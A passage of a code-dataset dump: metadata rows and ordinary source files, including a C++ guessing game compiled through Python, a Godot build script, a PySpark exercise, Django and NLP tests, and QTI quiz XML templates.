0.618462
35
325
5.742857
0.628571
0.099502
0
0
0
0
0
0
0
0
0
0.003534
0.129231
325
12
49
27.083333
0.706714
0.049231
0
0
0
0
0.256494
0.113636
0
0
0
0
0
1
0
false
0
0.125
0
0.125
0.5
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
1
0
1
e6ee864c778e3c7bd05d01ccaa072084d9d7a6f7
1,052
py
Python
17/kazuate_liar.cpp.py
Siketyan/Programming-I
0749c1ae045d53cd8a67f0de7ab13c26030ddd74
[ "Apache-2.0" ]
null
null
null
17/kazuate_liar.cpp.py
Siketyan/Programming-I
0749c1ae045d53cd8a67f0de7ab13c26030ddd74
[ "Apache-2.0" ]
null
null
null
17/kazuate_liar.cpp.py
Siketyan/Programming-I
0749c1ae045d53cd8a67f0de7ab13c26030ddd74
[ "Apache-2.0" ]
null
null
null
from subprocess import Popen, PIPE, call

name = "kazuate_liar.o"
src = """
#include <iostream>
#include <random>

using namespace std;

int main()
{
    random_device rd;
    mt19937 mt(rd());
    uniform_int_distribution<int> randfive(0, 4);
    uniform_int_distribution<int> randint(1, 100);

    int count = 0;
    int num = randint(mt);

    while (1)
    {
        int i;
        cout << "数を当ててみて ";
        cin >> i;

        if (i < 1 || i > 100)
        {
            cout << "不正な入力です。" << endl;
            continue;
        }

        count++;
        bool liar = randfive(mt) == 0;

        if (i == num)
        {
            cout << "正解です。おめでとう。 (" << count << " 回目)" << endl;
            break;
        }
        else if ((liar && i > num) || i < num)
        {
            cout << "もっと大きいよ。" << endl;
        }
        else
        {
            cout << "もっと小さいよ。" << endl;
        }
    }

    return 0;
}
""";

proc = Popen(["g++", "-o", name, "-x", "c++", "-"], stdin = PIPE);
proc.communicate(src.encode());
call(["./" + name]);
17.533333
66
0.439163
111
1,052
4.108108
0.522523
0.026316
0.096491
0.109649
0
0
0
0
0
0
0
0.029141
0.380228
1,052
59
67
17.830508
0.670245
0
0
0
0
0
0.834443
0.055186
0
0
0
0
0
1
0
false
0
0.021739
0
0.043478
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
e6fab2043b0b6fa907bee5da86873ddbf2cfe3cf
1,432
py
Python
platform/server/detect.py
leyyin/godot
68325d7254db711beaedddad218e2cddb405c42c
[ "CC-BY-3.0", "MIT" ]
24
2016-10-14T16:54:01.000Z
2022-01-15T06:39:17.000Z
platform/server/detect.py
leyyin/godot
68325d7254db711beaedddad218e2cddb405c42c
[ "CC-BY-3.0", "MIT" ]
17
2016-12-30T14:35:53.000Z
2017-03-07T21:07:50.000Z
platform/server/detect.py
leyyin/godot
68325d7254db711beaedddad218e2cddb405c42c
[ "CC-BY-3.0", "MIT" ]
9
2017-08-04T12:00:16.000Z
2021-12-10T06:48:28.000Z
import os
import sys


def is_active():
    return True


def get_name():
    return "Server"


def can_build():
    if (os.name!="posix"):
        return False
    return True # enabled


def get_opts():
    return [
        ('use_llvm','Use llvm compiler','no'),
        ('force_32_bits','Force 32 bits binary','no')
    ]


def get_flags():
    return [
        ('builtin_zlib', 'no'),
    ]


def configure(env):
    env.Append(CPPPATH=['#platform/server'])
    if (env["use_llvm"]=="yes"):
        env["CC"]="clang"
        env["CXX"]="clang++"
        env["LD"]="clang++"

    if (env["colored"]=="yes"):
        if sys.stdout.isatty():
            env.Append(CXXFLAGS=["-fcolor-diagnostics"])

    is64=sys.maxsize > 2**32

    if (env["bits"]=="default"):
        if (is64):
            env["bits"]="64"
        else:
            env["bits"]="32"

    #if (env["tools"]=="no"):
    #    #no tools suffix
    #    env['OBJSUFFIX'] = ".nt"+env['OBJSUFFIX']
    #    env['LIBSUFFIX'] = ".nt"+env['LIBSUFFIX']

    if (env["target"]=="release"):
        env.Append(CCFLAGS=['-O2','-ffast-math','-fomit-frame-pointer'])
    elif (env["target"]=="release_debug"):
        env.Append(CCFLAGS=['-O2','-ffast-math','-DDEBUG_ENABLED'])
    elif (env["target"]=="debug"):
        env.Append(CCFLAGS=['-g2', '-Wall','-DDEBUG_ENABLED','-DDEBUG_MEMORY_ENABLED'])

    env.Append(CPPFLAGS=['-DSERVER_ENABLED','-DUNIX_ENABLED'])
    env.Append(LIBS=['pthread','z']) #TODO detect linux/BSD!

    if (env["CXX"]=="clang++"):
        env.Append(CPPFLAGS=['-DTYPED_METHOD_BIND'])
        env["CC"]="clang"
        env["LD"]="clang++"
17.679012
81
0.609637
193
1,432
4.42487
0.435233
0.084309
0.056206
0.030445
0.063232
0.063232
0
0
0
0
0
0.014516
0.134078
1,432
80
82
17.9
0.674194
0.106844
0
0.173913
0
0
0.335697
0.017336
0
0
0
0.0125
0
1
0.130435
false
0
0.043478
0.086957
0.304348
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
1
0
0
0
0
0
0
0
0
0
0
1
e6fc32c8a31669a37234337e3418a714af3c26bd
1,483
py
Python
IntroToSpark/Assign4_Q1-6_action.py
petersontylerd/spark-courses
e8dcb4968ea31a50206739e6af3006889f8c3c6c
[ "MIT" ]
null
null
null
IntroToSpark/Assign4_Q1-6_action.py
petersontylerd/spark-courses
e8dcb4968ea31a50206739e6af3006889f8c3c6c
[ "MIT" ]
null
null
null
IntroToSpark/Assign4_Q1-6_action.py
petersontylerd/spark-courses
e8dcb4968ea31a50206739e6af3006889f8c3c6c
[ "MIT" ]
1
2021-03-26T11:47:37.000Z
2021-03-26T11:47:37.000Z
import csv
from pyspark.sql import SparkSession
from pyspark.sql.types import IntegerType

spark = SparkSession.builder.appName("Assignment4").getOrCreate()
sc = spark.sparkContext

# load data to dataframe
path = 'fake_data.csv'
df = spark.read.format('csv').option('header','true').load(path)

# cast income as an integer
df = df.withColumn('Income', df['Income'].cast(IntegerType()))

# Question 1
print('*' * 30)
print('\nQuestion 1\n')
print(df.rdd.map(lambda x: (x[1], x[0])).groupByKey().mapValues(lambda vals: len(set(vals))).sortBy(lambda a: a[1], ascending = False).take(1))
print('\n\n')

# Question 2
print('*' * 30)
print('\nQuestion 2\n')
print(df.rdd.filter(lambda v: v[1] == 'United States of America').map(lambda x: (x[1], x[4])).groupByKey().mapValues(lambda x: sum(x) / len(x)).collect())
print('\n\n')

# Question 3
print('*' * 30)
print('\nQuestion 3\n')
print(df.rdd.filter(lambda v: v[4] > 100000).filter(lambda v: v[7] == 'FALSE').count())
print('\n\n')

# Question 4
print('*' * 30)
print('\nQuestion 4\n')
print(df.rdd.filter(lambda v: v[1] == 'United States of America').sortBy(lambda x: x[4], ascending = False).map(lambda x: (x[3], x[6], x[4], x[5])).take(10))
print('\n\n')

# Question 5
print('*' * 30)
print('\nQuestion 5\n')
print(df.rdd.groupBy(lambda x: x[5]).count())
print('\n\n')

# Question 6
print('*' * 30)
print('\nQuestion 6\n')
print(df.rdd.filter(lambda v: v[5] == 'Writer').filter(lambda x: x[4] < 100000).count())
print('\n\n')
26.017544
157
0.652057
246
1,483
3.926829
0.296748
0.050725
0.074534
0.130435
0.217391
0.175983
0.149068
0.149068
0.097308
0.097308
0
0.043511
0.116655
1,483
56
158
26.482143
0.693893
0.076871
0
0.375
0
0
0.163476
0
0
0
0
0
0
1
0
false
0
0.09375
0
0.09375
0.75
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
1
0
1
e6fc5742d6236482be2f3020d03479a9c33e3222
274
py
Python
src/firebot/tests/factories.py
zipmex/fire
a41bbdbc86085c055ae4706fadea4f142e881a85
[ "Apache-2.0" ]
52
2017-03-15T16:25:14.000Z
2022-03-01T16:50:14.000Z
src/firebot/tests/factories.py
zipmex/fire
a41bbdbc86085c055ae4706fadea4f142e881a85
[ "Apache-2.0" ]
239
2017-03-16T17:10:22.000Z
2022-03-06T07:24:24.000Z
src/firebot/tests/factories.py
zipmex/fire
a41bbdbc86085c055ae4706fadea4f142e881a85
[ "Apache-2.0" ]
8
2017-03-15T17:45:18.000Z
2022-01-26T14:51:03.000Z
import factory

from django.contrib.auth import get_user_model


class UserFactory(factory.DjangoModelFactory):
    class Meta:
        model = get_user_model()

    first_name = factory.Faker('name')
    last_name = factory.Faker('name')
    email = factory.Faker('email')
21.076923
46
0.715328
34
274
5.588235
0.529412
0.189474
0.126316
0.210526
0
0
0
0
0
0
0
0
0.182482
274
12
47
22.833333
0.848214
0
0
0
0
0
0.047445
0
0
0
0
0
0
1
0
false
0
0.25
0
0.875
0
0
0
0
null
0
0
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
e6fc7870ccb1bbdefca5d31e7c6358dd9b6c9578
482
py
Python
reamber/o2jam/O2JHold.py
Bestfast/reamberPy
91b76ca6adf11fbe8b7cee7c186481776a4d7aaa
[ "MIT" ]
null
null
null
reamber/o2jam/O2JHold.py
Bestfast/reamberPy
91b76ca6adf11fbe8b7cee7c186481776a4d7aaa
[ "MIT" ]
null
null
null
reamber/o2jam/O2JHold.py
Bestfast/reamberPy
91b76ca6adf11fbe8b7cee7c186481776a4d7aaa
[ "MIT" ]
null
null
null
from dataclasses import dataclass, field

from reamber.base.Hold import Hold, HoldTail
from reamber.o2jam.O2JNoteMeta import O2JNoteMeta


@dataclass
class O2JHoldTail(HoldTail, O2JNoteMeta):
    pass


@dataclass
class O2JHold(Hold, O2JNoteMeta):
    """ Defines the O2Jam Bpm Object

    The O2Jam Bpm Object is stored in binary file .ojn """

    _tail: O2JHoldTail = field(init=False)

    def _upcastTail(self, **kwargs) -> O2JHoldTail:
        return O2JHoldTail(**kwargs)
21.909091
54
0.73029
57
482
6.140351
0.578947
0.062857
0.062857
0.097143
0
0
0
0
0
0
0
0.030612
0.186722
482
21
55
22.952381
0.862245
0.165975
0
0.181818
0
0
0
0
0
0
0
0
0
1
0.090909
false
0.090909
0.272727
0.090909
0.727273
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
1
0
0
0
0
0
1
fc01bbc538287134d61e574ed4af064a81cfdf43
1,307
py
Python
test/utils/test_geodesic.py
shrey-bansal/pytorch_geometric
17108a08066b0a73530544d01719b186f2625ef2
[ "MIT" ]
2
2020-12-06T13:10:52.000Z
2021-07-06T06:50:10.000Z
test/utils/test_geodesic.py
shrey-bansal/pytorch_geometric
17108a08066b0a73530544d01719b186f2625ef2
[ "MIT" ]
null
null
null
test/utils/test_geodesic.py
shrey-bansal/pytorch_geometric
17108a08066b0a73530544d01719b186f2625ef2
[ "MIT" ]
1
2019-05-31T02:45:38.000Z
2019-05-31T02:45:38.000Z
from math import sqrt

import torch
from torch_geometric.utils import geodesic_distance


def test_geodesic_distance():
    pos = torch.Tensor([[0, 0, 0], [2, 0, 0], [0, 2, 0], [2, 2, 0]])
    face = torch.tensor([[0, 1, 3], [0, 2, 3]]).t()

    out = geodesic_distance(pos, face)
    expected = [
        [0, 1, 1, sqrt(2)],
        [1, 0, sqrt(2), 1],
        [1, sqrt(2), 0, 1],
        [sqrt(2), 1, 1, 0],
    ]
    assert torch.allclose(out, torch.tensor(expected))
    assert torch.allclose(out, geodesic_distance(pos, face, num_workers=-1))

    out = geodesic_distance(pos, face, norm=False)
    expected = [
        [0, 2, 2, 2 * sqrt(2)],
        [2, 0, 2 * sqrt(2), 2],
        [2, 2 * sqrt(2), 0, 2],
        [2 * sqrt(2), 2, 2, 0],
    ]
    assert torch.allclose(out, torch.tensor(expected))

    src = torch.tensor([0, 0, 0, 0])
    dest = torch.tensor([0, 1, 2, 3])
    out = geodesic_distance(pos, face, src=src, dest=dest)
    expected = [0, 1, 1, sqrt(2)]
    assert torch.allclose(out, torch.tensor(expected))

    out = geodesic_distance(pos, face, src=src[0:1])
    expected = [0, 1, 1, sqrt(2)]
    assert torch.allclose(out, torch.tensor(expected))

    out = geodesic_distance(pos, face, dest=dest)
    expected = [0, 0, 0, 0]
    assert torch.allclose(out, torch.Tensor(expected))
30.395349
76
0.574598
202
1,307
3.663366
0.143564
0.027027
0.17973
0.178378
0.662162
0.467568
0.445946
0.394595
0.224324
0.224324
0
0.077778
0.24254
1,307
42
77
31.119048
0.669697
0
0
0.235294
0
0
0
0
0
0
0
0
0.176471
1
0.029412
false
0
0.088235
0
0.117647
0
0
0
0
null
0
0
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
fc021cb14dd8b84a0a6873924f2194048e2791f0
1,415
py
Python
forte/processors/tests/stanfordnlp_processor_test.py
tcl326/forte
d0d7b8b97da5e1d507dfa7cd4ec51d96067770b8
[ "Apache-2.0" ]
null
null
null
forte/processors/tests/stanfordnlp_processor_test.py
tcl326/forte
d0d7b8b97da5e1d507dfa7cd4ec51d96067770b8
[ "Apache-2.0" ]
null
null
null
forte/processors/tests/stanfordnlp_processor_test.py
tcl326/forte
d0d7b8b97da5e1d507dfa7cd4ec51d96067770b8
[ "Apache-2.0" ]
null
null
null
"""This module tests Stanford NLP processors.""" import os import unittest from texar.torch import HParams from forte.pipeline import Pipeline from forte.data.readers import StringReader from forte.processors.stanfordnlp_processor import StandfordNLPProcessor from ft.onto.base_ontology import Token, Sentence class TestStanfordNLPProcessor(unittest.TestCase): def setUp(self): self.stanford_nlp = Pipeline() self.stanford_nlp.set_reader(StringReader()) models_path = os.getcwd() config = HParams({ "processors": "tokenize", "lang": "en", # Language code for the language to build the Pipeline "use_gpu": False }, StandfordNLPProcessor.default_hparams()) self.stanford_nlp.add_processor(StandfordNLPProcessor(models_path), config=config) self.stanford_nlp.initialize() # TODO @unittest.skip("We need to test this without needing to download models " "everytime") def test_stanford_processor(self): sentences = ["This tool is called Forte.", "The goal of this project to help you build NLP " "pipelines.", "NLP has never been made this easy before."] document = ' '.join(sentences) pack = self.stanford_nlp.process(document) print(pack)
36.282051
77
0.638869
152
1,415
5.848684
0.552632
0.074241
0.084364
0
0
0
0
0
0
0
0
0
0.279859
1,415
38
78
37.236842
0.872424
0.071378
0
0
0
0
0.16909
0
0
0
0
0.026316
0
1
0.066667
false
0
0.233333
0
0.333333
0.033333
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
1
0
0
0
0
0
0
0
0
0
0
1
fc070f80801a319fdf697b23e027ce45aa2d558c
26,632
py
Python
text2cc/xml_assessment.py
dlehman83/text2cc
303798993590bceaeb5238a6cce82893c37cdfc7
[ "BSD-3-Clause" ]
1
2021-02-12T09:34:07.000Z
2021-02-12T09:34:07.000Z
text2cc/xml_assessment.py
dlehman83/text2cc
303798993590bceaeb5238a6cce82893c37cdfc7
[ "BSD-3-Clause" ]
null
null
null
text2cc/xml_assessment.py
dlehman83/text2cc
303798993590bceaeb5238a6cce82893c37cdfc7
[ "BSD-3-Clause" ]
null
null
null
# -*- coding: utf-8 -*- # # Copyright (c) 2021, Dana Lehman # Copyright (c) 2020, Geoffrey M. Poore # All rights reserved. # # Licensed under the BSD 3-Clause License: # http://opensource.org/licenses/BSD-3-Clause # from .quiz import Quiz, Question, GroupStart, GroupEnd, TextRegion BEFORE_ITEMS = '''\ <?xml version="1.0" encoding="UTF-8"?> <questestinterop xmlns="http://www.imsglobal.org/xsd/ims_qtiasiv1p2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.imsglobal.org/xsd/ims_qtiasiv1p2 http://www.imsglobal.org/profile/cc/ccv1p2/ccv1p2_qtiasiv1p2p1_v1p0.xsd"> <assessment ident="{assessment_identifier}" title="{title}"> <qtimetadata> <qtimetadatafield> <fieldlabel>cc_maxattempts</fieldlabel> <fieldentry>1</fieldentry> </qtimetadatafield> <qtimetadatafield> <fieldlabel> cc_profile </fieldlabel> <fieldentry> cc.exam.v0p1 </fieldentry> </qtimetadatafield> <qtimetadatafield> <fieldlabel> qmd_assessmenttype </fieldlabel> <fieldentry> Examination </fieldentry> </qtimetadatafield> </qtimetadata> <section ident="root_section"> ''' AFTER_ITEMS = '''\ </section> </assessment> </questestinterop> ''' GROUP_START = '''\ <section ident="{ident}" title="{group_title}"> <selection_ordering> <selection> <selection_number>{pick}</selection_number> <selection_extension> <points_per_item>{points_per_item}</points_per_item> </selection_extension> </selection> </selection_ordering> ''' GROUP_END = '''\ </section> ''' TEXT = '''\ <item ident="{ident}" title="{text_title_xml}"> <itemmetadata> <qtimetadata> <qtimetadatafield> <fieldlabel>cc_profile</fieldlabel> <fieldentry>text_only_question</fieldentry> </qtimetadatafield> <qtimetadatafield> <fieldlabel>points_possible</fieldlabel> <fieldentry>0</fieldentry> </qtimetadatafield> <qtimetadatafield> <fieldlabel>original_answer_ids</fieldlabel> <fieldentry></fieldentry> </qtimetadatafield> <qtimetadatafield> <fieldlabel>assessment_question_identifierref</fieldlabel> <fieldentry>{assessment_question_identifierref}</fieldentry> </qtimetadatafield> </qtimetadata> </itemmetadata> <presentation> <material> <mattext texttype="text/html">{text_html_xml}</mattext> </material> </presentation> </item> ''' START_ITEM = '''\ <item ident="{question_identifier}" title="{question_title}"> ''' END_ITEM = '''\ </item> ''' ITEM_METADATA_MCTF_SHORTANS_MULTANS_NUM = '''\ <itemmetadata> <qtimetadata> <qtimetadatafield> <fieldlabel>cc_profile</fieldlabel> <fieldentry>{question_type}</fieldentry> </qtimetadatafield> <qtimetadatafield> <fieldlabel>points_possible</fieldlabel> <fieldentry>{points_possible}</fieldentry> </qtimetadatafield> <qtimetadatafield> <fieldlabel>original_answer_ids</fieldlabel> <fieldentry>{original_answer_ids}</fieldentry> </qtimetadatafield> <qtimetadatafield> <fieldlabel>assessment_question_identifierref</fieldlabel> <fieldentry>{assessment_question_identifierref}</fieldentry> </qtimetadatafield> </qtimetadata> </itemmetadata> ''' ITEM_METADATA_ESSAY = ITEM_METADATA_MCTF_SHORTANS_MULTANS_NUM.replace('{original_answer_ids}', '') ITEM_METADATA_UPLOAD = ITEM_METADATA_ESSAY ITEM_PRESENTATION_MCTF = '''\ <presentation> <material> <mattext texttype="text/html">{question_html_xml}</mattext> </material> <response_lid ident="response1" rcardinality="Single"> <render_choice> {choices} </render_choice> </response_lid> </presentation> ''' ITEM_PRESENTATION_MCTF_CHOICE = '''\ <response_label ident="{ident}"> <material> <mattext texttype="text/html">{choice_html_xml}</mattext> </material> </response_label>''' ITEM_PRESENTATION_MULTANS = 
ITEM_PRESENTATION_MCTF.replace('Single', 'Multiple') ITEM_PRESENTATION_MULTANS_CHOICE = ITEM_PRESENTATION_MCTF_CHOICE ITEM_PRESENTATION_SHORTANS = '''\ <presentation> <material> <mattext texttype="text/html">{question_html_xml}</mattext> </material> <response_str ident="response1" rcardinality="Single"> <render_fib> <response_label ident="answer1" rshuffle="No"/> </render_fib> </response_str> </presentation> ''' ITEM_PRESENTATION_ESSAY = '''\ <presentation> <material> <mattext texttype="text/html">{question_html_xml}</mattext> </material> <response_str ident="response1" rcardinality="Single"> <render_fib> <response_label ident="answer1" rshuffle="No"/> </render_fib> </response_str> </presentation> ''' ITEM_PRESENTATION_UPLOAD = '''\ <presentation> <material> <mattext texttype="text/html">{question_html_xml}</mattext> </material> </presentation> ''' ITEM_PRESENTATION_NUM = '''\ <presentation> <material> <mattext texttype="text/html">{question_html_xml}</mattext> </material> <response_str ident="response1" rcardinality="Single"> <render_fib fibtype="Decimal"> <response_label ident="answer1"/> </render_fib> </response_str> </presentation> ''' ITEM_RESPROCESSING_START = '''\ <resprocessing> <outcomes> <decvar maxvalue="100" minvalue="0" varname="SCORE" vartype="Decimal"/> </outcomes> ''' ITEM_RESPROCESSING_MCTF_GENERAL_FEEDBACK = '''\ <respcondition continue="Yes"> <conditionvar> <other/> </conditionvar> <displayfeedback feedbacktype="Response" linkrefid="general_fb"/> </respcondition> ''' ITEM_RESPROCESSING_MCTF_CHOICE_FEEDBACK = '''\ <respcondition continue="Yes"> <conditionvar> <varequal respident="response1">{ident}</varequal> </conditionvar> <displayfeedback feedbacktype="Response" linkrefid="{ident}_fb"/> </respcondition> ''' ITEM_RESPROCESSING_MCTF_SET_CORRECT_WITH_FEEDBACK = '''\ <respcondition continue="No"> <conditionvar> <varequal respident="response1">{ident}</varequal> </conditionvar> <setvar action="Set" varname="SCORE">100</setvar> <displayfeedback feedbacktype="Response" linkrefid="correct_fb"/> </respcondition> ''' ITEM_RESPROCESSING_MCTF_SET_CORRECT_NO_FEEDBACK = '''\ <respcondition continue="No"> <conditionvar> <varequal respident="response1">{ident}</varequal> </conditionvar> <setvar action="Set" varname="SCORE">100</setvar> </respcondition> ''' ITEM_RESPROCESSING_MCTF_INCORRECT_FEEDBACK = '''\ <respcondition continue="Yes"> <conditionvar> <other/> </conditionvar> <displayfeedback feedbacktype="Response" linkrefid="general_incorrect_fb"/> </respcondition> ''' ITEM_RESPROCESSING_SHORTANS_GENERAL_FEEDBACK = ITEM_RESPROCESSING_MCTF_GENERAL_FEEDBACK ITEM_RESPROCESSING_SHORTANS_CHOICE_FEEDBACK = '''\ <respcondition continue="Yes"> <conditionvar> <varequal respident="response1">{answer_xml}</varequal> </conditionvar> <displayfeedback feedbacktype="Response" linkrefid="{ident}_fb"/> </respcondition> ''' ITEM_RESPROCESSING_SHORTANS_SET_CORRECT_WITH_FEEDBACK = '''\ <respcondition continue="No"> <conditionvar> {varequal} </conditionvar> <setvar action="Set" varname="SCORE">100</setvar> <displayfeedback feedbacktype="Response" linkrefid="correct_fb"/> </respcondition> ''' ITEM_RESPROCESSING_SHORTANS_SET_CORRECT_NO_FEEDBACK = '''\ <respcondition continue="No"> <conditionvar> {varequal} </conditionvar> <setvar action="Set" varname="SCORE">100</setvar> </respcondition> ''' ITEM_RESPROCESSING_SHORTANS_SET_CORRECT_VAREQUAL = '''\ <varequal respident="response1">{answer_xml}</varequal>''' ITEM_RESPROCESSING_SHORTANS_INCORRECT_FEEDBACK = ITEM_RESPROCESSING_MCTF_INCORRECT_FEEDBACK 
ITEM_RESPROCESSING_MULTANS_GENERAL_FEEDBACK = ITEM_RESPROCESSING_MCTF_GENERAL_FEEDBACK ITEM_RESPROCESSING_MULTANS_CHOICE_FEEDBACK = ITEM_RESPROCESSING_MCTF_CHOICE_FEEDBACK ITEM_RESPROCESSING_MULTANS_SET_CORRECT_WITH_FEEDBACK = '''\ <respcondition continue="No"> <conditionvar> <and> {varequal} </and> </conditionvar> <setvar action="Set" varname="SCORE">100</setvar> <displayfeedback feedbacktype="Response" linkrefid="correct_fb"/> </respcondition> ''' ITEM_RESPROCESSING_MULTANS_SET_CORRECT_NO_FEEDBACK = '''\ <respcondition continue="No"> <conditionvar> <and> {varequal} </and> </conditionvar> <setvar action="Set" varname="SCORE">100</setvar> </respcondition> ''' ITEM_RESPROCESSING_MULTANS_SET_CORRECT_VAREQUAL_CORRECT = '''\ <varequal respident="response1">{ident}</varequal>''' ITEM_RESPROCESSING_MULTANS_SET_CORRECT_VAREQUAL_INCORRECT = '''\ <not> <varequal respident="response1">{ident}</varequal> </not>''' ITEM_RESPROCESSING_MULTANS_INCORRECT_FEEDBACK = ITEM_RESPROCESSING_MCTF_INCORRECT_FEEDBACK ITEM_RESPROCESSING_ESSAY_GENERAL_FEEDBACK = ITEM_RESPROCESSING_MCTF_GENERAL_FEEDBACK ITEM_RESPROCESSING_UPLOAD_GENERAL_FEEDBACK = ITEM_RESPROCESSING_MCTF_GENERAL_FEEDBACK ITEM_RESPROCESSING_NUM_GENERAL_FEEDBACK = ITEM_RESPROCESSING_MCTF_GENERAL_FEEDBACK ITEM_RESPROCESSING_NUM_RANGE_SET_CORRECT_WITH_FEEDBACK = '''\ <respcondition continue="No"> <conditionvar> <vargte respident="response1">{num_min}</vargte> <varlte respident="response1">{num_max}</varlte> </conditionvar> <setvar action="Set" varname="SCORE">100</setvar> <displayfeedback feedbacktype="Response" linkrefid="correct_fb"/> </respcondition> ''' ITEM_RESPROCESSING_NUM_RANGE_SET_CORRECT_NO_FEEDBACK = '''\ <respcondition continue="No"> <conditionvar> <vargte respident="response1">{num_min}</vargte> <varlte respident="response1">{num_max}</varlte> </conditionvar> <setvar action="Set" varname="SCORE">100</setvar> </respcondition> ''' ITEM_RESPROCESSING_NUM_EXACT_SET_CORRECT_WITH_FEEDBACK = '''\ <respcondition continue="No"> <conditionvar> <or> <varequal respident="response1">{num_exact}</varequal> <and> <vargte respident="response1">{num_min}</vargte> <varlte respident="response1">{num_max}</varlte> </and> </or> </conditionvar> <setvar action="Set" varname="SCORE">100</setvar> <displayfeedback feedbacktype="Response" linkrefid="correct_fb"/> </respcondition> ''' ITEM_RESPROCESSING_NUM_EXACT_SET_CORRECT_NO_FEEDBACK = '''\ <respcondition continue="No"> <conditionvar> <or> <varequal respident="response1">{num_exact}</varequal> <and> <vargte respident="response1">{num_min}</vargte> <varlte respident="response1">{num_max}</varlte> </and> </or> </conditionvar> <setvar action="Set" varname="SCORE">100</setvar> </respcondition> ''' ITEM_RESPROCESSING_NUM_INCORRECT_FEEDBACK = ITEM_RESPROCESSING_MCTF_INCORRECT_FEEDBACK ITEM_RESPROCESSING_ESSAY = '''\ <respcondition continue="No"> <conditionvar> <other/> </conditionvar> </respcondition> ''' ITEM_RESPROCESSING_END = '''\ </resprocessing> ''' ITEM_FEEDBACK_MCTF_SHORTANS_MULTANS_NUM_GENERAL = '''\ <itemfeedback ident="general_fb"> <flow_mat> <material> <mattext texttype="text/html">{feedback}</mattext> </material> </flow_mat> </itemfeedback> ''' ITEM_FEEDBACK_MCTF_SHORTANS_MULTANS_NUM_CORRECT = '''\ <itemfeedback ident="correct_fb"> <flow_mat> <material> <mattext texttype="text/html">{feedback}</mattext> </material> </flow_mat> </itemfeedback> ''' ITEM_FEEDBACK_MCTF_SHORTANS_MULTANS_NUM_INCORRECT = '''\ <itemfeedback ident="general_incorrect_fb"> <flow_mat> <material> <mattext 
texttype="text/html">{feedback}</mattext> </material> </flow_mat> </itemfeedback> ''' ITEM_FEEDBACK_MCTF_SHORTANS_MULTANS_NUM_INDIVIDUAL = '''\ <itemfeedback ident="{ident}_fb"> <flow_mat> <material> <mattext texttype="text/html">{feedback}</mattext> </material> </flow_mat> </itemfeedback> ''' def assessment(*, quiz: Quiz, assessment_identifier: str, title_xml: str) -> str: ''' Generate assessment XML from Quiz. ''' xml = [] xml.append(BEFORE_ITEMS.format(assessment_identifier=assessment_identifier, title=title_xml)) for question_or_delim in quiz.questions_and_delims: if isinstance(question_or_delim, TextRegion): xml.append(TEXT.format(ident=f'text2qti_text_{question_or_delim.id}', text_title_xml=question_or_delim.title_xml, assessment_question_identifierref=f'text2qti_question_ref_{question_or_delim.id}', text_html_xml=question_or_delim.text_html_xml)) continue if isinstance(question_or_delim, GroupStart): xml.append(GROUP_START.format(ident=f'text2qti_group_{question_or_delim.group.id}', group_title=question_or_delim.group.title_xml, pick=question_or_delim.group.pick, points_per_item=question_or_delim.group.points_per_question)) continue if isinstance(question_or_delim, GroupEnd): xml.append(GROUP_END) continue if not isinstance(question_or_delim, Question): raise TypeError question = question_or_delim xml.append(START_ITEM.format(question_identifier=f'text2qti_question_{question.id}', question_title=question.title_xml)) if question.type in ('true_false_question', 'multiple_choice_question', 'short_answer_question', 'multiple_answers_question'): item_metadata = ITEM_METADATA_MCTF_SHORTANS_MULTANS_NUM original_answer_ids = ','.join(f'text2qti_choice_{c.id}' for c in question.choices) elif question.type == 'numerical_question': item_metadata = ITEM_METADATA_MCTF_SHORTANS_MULTANS_NUM original_answer_ids = f'text2qti_numerical_{question.id}' elif question.type == 'essay_question': item_metadata = ITEM_METADATA_ESSAY original_answer_ids = f'text2qti_essay_{question.id}' elif question.type == 'file_upload_question': item_metadata = ITEM_METADATA_UPLOAD original_answer_ids = f'text2qti_upload_{question.id}' else: raise ValueError #Type Change for Schoology CC Import if question.type == 'multiple_choice_question': typechange = 'cc.multiple_choice.v0p1' elif question.type == 'true_false_question': typechange = 'cc.true_false.v0p1' elif question.type == 'short_answer_question': typechange = 'cc.fib.v0p1' elif question.type == 'multiple_answers_question': typechange = 'cc.multiple_response.v0p1' elif question.type == 'essay_question': typechange = 'cc.essay.v0p1' else: typechange = question.type xml.append(item_metadata.format(question_type=typechange, points_possible=question.points_possible, original_answer_ids=original_answer_ids, assessment_question_identifierref=f'text2qti_question_ref_{question.id}')) if question.type in ('true_false_question', 'multiple_choice_question', 'multiple_answers_question'): if question.type in ('true_false_question', 'multiple_choice_question'): item_presentation_choice = ITEM_PRESENTATION_MCTF_CHOICE item_presentation = ITEM_PRESENTATION_MCTF elif question.type == 'multiple_answers_question': item_presentation_choice = ITEM_PRESENTATION_MULTANS_CHOICE item_presentation = ITEM_PRESENTATION_MULTANS else: raise ValueError choices = '\n'.join(item_presentation_choice.format(ident=f'text2qti_choice_{c.id}', choice_html_xml=c.choice_html_xml) for c in question.choices) xml.append(item_presentation.format(question_html_xml=question.question_html_xml, choices=choices)) 
